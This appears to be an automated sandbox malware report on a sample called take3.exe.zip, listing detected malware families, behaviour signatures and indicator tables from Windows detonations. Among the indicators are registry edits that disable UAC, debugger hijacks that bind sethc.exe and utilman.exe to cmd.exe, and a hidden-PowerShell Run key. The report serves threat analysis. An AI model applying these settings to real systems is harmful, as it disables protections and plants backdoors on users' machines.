Analysis Overview
SHA256
5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9
Threat Level: Known bad
The file take3.exe.zip was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Metasploit family
xmrig
Amadey family
Quasar family
MetaSploit
Amadey
Asyncrat family
Ammyy Admin
UAC bypass
Detect Xworm Payload
FlawedAmmyy RAT
Xmrig family
AmmyyAdmin payload
Ammyyadmin family
Xworm
Xred family
Xworm family
njRAT/Bladabindi
Njrat family
Flawedammyy family
Xred
Lumma family
AsyncRat
Lumma Stealer, LummaC
Quasar RAT
XMRig Miner payload
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Enumerates VirtualBox registry keys
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Blocklisted process makes network request
Download via BitsAdmin
Sets file to hidden
Event Triggered Execution: Image File Execution Options Injection
Modifies Windows Firewall
Downloads MZ/PE file
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Drops startup file
VMProtect packed file
Checks BIOS information in registry
Loads dropped DLL
Reads user/profile data of web browsers
Identifies Wine through registry keys
Event Triggered Execution: Component Object Model Hijacking
Checks computer location settings
Reads data files stored by FTP clients
Modifies file permissions
.NET Reactor proctector
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
UPX packed file
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Access Token Manipulation: Create Process with Token
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Accessibility Features
Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
NSIS installer
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Views/modifies file attributes
GoLang User-Agent
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Gathers network information
Enumerates system info in registry
Runs net.exe
Uses Task Scheduler COM API
Delays execution with timeout.exe
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Opens file in notepad (likely ransom note)
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-28 19:56
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-28 19:56
Reported
2024-11-28 19:58
Platform
win7-20240729-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
| PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI23282\python311.dll
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
| SHA1 | f59782a4923a30118b97e01a7f8db69b92d8382a |
| SHA256 | a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7 |
| SHA512 | 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 19:56
Reported
2024-11-28 19:58
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
FlawedAmmyy RAT
Flawedammyy family
Lumma Stealer, LummaC
Lumma family
MetaSploit
Metasploit family
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
Xmrig family
Xred
Xred family
Xworm
Xworm family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\boot.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\langla.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe | C:\Users\Admin\Downloads\UrlHausFiles\22.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\translucently.vbs | C:\Users\Admin\AppData\Local\palladiums\translucently.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe | C:\Users\Admin\Downloads\UrlHausFiles\22.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Downloads\\UrlHausFiles\\nbea1t8.exe'\"" | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2916 set thread context of 4928 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler64.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_fr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ja.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ar.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_th.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bn.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_et.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_vi.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fil.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_it.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_es-419.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bg.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_te.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ml.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser_64.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en-GB.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ur.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine_64.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateOnDemand.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_it.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_tr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_zh-TW.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateBroker.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psuser.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_kn.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_id.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_lv.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine_64.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_is.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_no.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ru.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_hu.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ms.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hi.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pl.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_mr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\GUT656E.tmp | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateBroker.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_am.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_mr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ta.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_tr.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_pt-BR.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_uk.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
